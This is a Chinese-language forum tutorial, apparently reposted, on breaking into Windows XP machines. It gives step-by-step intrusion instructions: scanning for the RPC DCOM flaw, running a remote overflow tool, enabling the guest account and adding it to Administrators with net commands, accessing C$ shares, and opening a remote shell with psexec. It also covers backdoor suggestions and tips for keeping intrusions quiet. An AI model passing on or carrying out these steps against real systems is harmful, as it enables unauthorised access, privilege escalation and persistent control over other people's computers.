天天看點

xp系列

.思路:突破xp系統遠端通路的限制,實作檔案傳輸和遠端登陸。

2.工具:rpc漏洞掃描工具、溢出工具,pstools工具包。

3.步驟

1)步驟一:rpc漏洞掃描:

推薦使用retinarpcdcom.exe(eeye公司推出的專門針對RPC漏洞的掃描工具)

圖形界面,在劍鷹網絡安全小組有下載下傳。

2)步驟二:遠端溢出:

在劍鷹網絡安全小組有很多該類工具下載下傳,我用xp.exe,溢出成功率極高。

3)步驟三:提升guest權限(本方案之關鍵):

指令:net user guest /active:yes

net localgroup aministrators guest /add

——————————————————————————————

看到這裡,也許你會嗤之以鼻,

可這正是大家忽略的地方,因為guest有與其它所有帳号不同的特性。

如果你用net user guest指令,将會看到下面的内容:

Password required            No

這正是突破xp系統遠端通路帳号限制的突破口!

除了guest外,其它帳号都是

Password required           yes

是以就算你有xp系統的管理者帳号密碼一樣無所作為。

當guest提升為admin權限後,你試試

dir \\IP\c$ 

呵呵,現在你已經有了讀寫權限,連ipc$連接配接都省了~~

當然你也一樣可以用net use \\ip "" /user:"guest"來進行IPC$連接配接

(不過是多此一舉)。

到此,檔案傳輸的問題已經解決!

4)步驟四:遠端登陸

我們當然不想每次用溢出登陸對方。

那麼就試試opentelnet吧

>opentelnet \\ip guest "" 1 90

read ntlm failed                   \\****!用administrator也是這樣子。

上傳srv.exe試試,我沒試過,有興趣的自己試試。

因為我認為用p***ec友善多了。指令如下:

p***ec \\ip cmd       (連ipc$不用開了,爽吧)

5)關于後門:

各顯神通,我正好用來試試榕哥的bits.dll,感覺一點都不好,

榕哥的fans可别拿雞蛋扔我哦~~

6)注意事項:

千萬别在xp系統中建新帳戶(為什麼?自己想想)

xp系統預設隻能登陸一個帳戶,故用3389的遠端登陸是不行的。

rpc溢出會導緻對方重新開機,要慎用,尤其是伺服器。

4.多餘的話(可以不看):

a.現在國内安全論壇上很多人讨論xp入侵的話題。

讨論的結果似乎并未找到好的解決方案,很多高手也隻扔下一句

“rpc溢出”後閃人。是以本人将自己一點粗淺的心得說出來給大家分享,

因為本人并不懂得多少理論知識,是以論述中可能存在了解錯誤的地方,

請大家指正。

b.本方案無論技術還是入侵方法都沒有任何創新的地方,隻是給大家提供一條思路。

本方案已在多台機上作過測試,大部分都能成功,也有少數在提升guest權限後還是無法

通路。具體原因請大家一起探讨。

c.本方案的思路完全是經過自己的思考和多次實踐摸索得來,并非抄襲于他人。

d.謹以此文獻給菜菜鳥社群。謝謝iqst和zzzEVAzzz對我們的熱心幫助和指導。

繼續閱讀